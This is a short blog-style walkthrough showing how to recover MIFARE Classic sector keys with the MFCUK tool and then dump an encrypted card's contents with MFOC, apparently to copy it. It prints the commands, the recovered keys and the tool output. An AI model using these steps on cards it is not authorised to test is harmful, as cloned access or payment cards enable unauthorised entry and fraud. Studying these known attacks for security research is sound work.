Recover keys and dump content into file

MFCUK – MiFare Classic Universal toolKit.

Recovering a key without know any key, and it took few minutes to a couple of ten minutes to recover a key

ubuntu@ubuntu:~$ sudo mfcuk -C -R 0:A -v 2

INFO: block 3 recovered KEY: 8c9c83f6d192

ubuntu@ubuntu:~$ sudo mfcuk -C -R 0:B -v 2

INFO: block 3 recovered KEY: f4a9ef2afc6d

Some time we get recoverable error, but decrypt process is still fine.
RECOVER: 0mfcuk: ERROR: mfcuk_key_recovery_block() (error code=0x03)

MFOC is an open source implementation of “offline nested” attack by Nethemba.

If a card uses at least one block encrypted with a default key, all the other keys can be extracted in minutes. If the card does not use default keys, one key for a sector can be retrieved using the MFCUK library, after which this library can be used.

By use keys for a sectors are retrieved using the MFCUK library:

sudo mfoc -k 8c9c83f6d192 -k f4a9ef2afc6d -P 500 -O cardtocopy.dmp


The custom key 0x8c9c83f6d192 has been added to the default keys
The custom key 0xf4a9ef2afc6d has been added to the default keys
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 2a e9 0e 52
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

The content of encrypted card is dumping into “cardtocopy.dmp”

Leave a Reply

Your email address will not be published. Required fields are marked *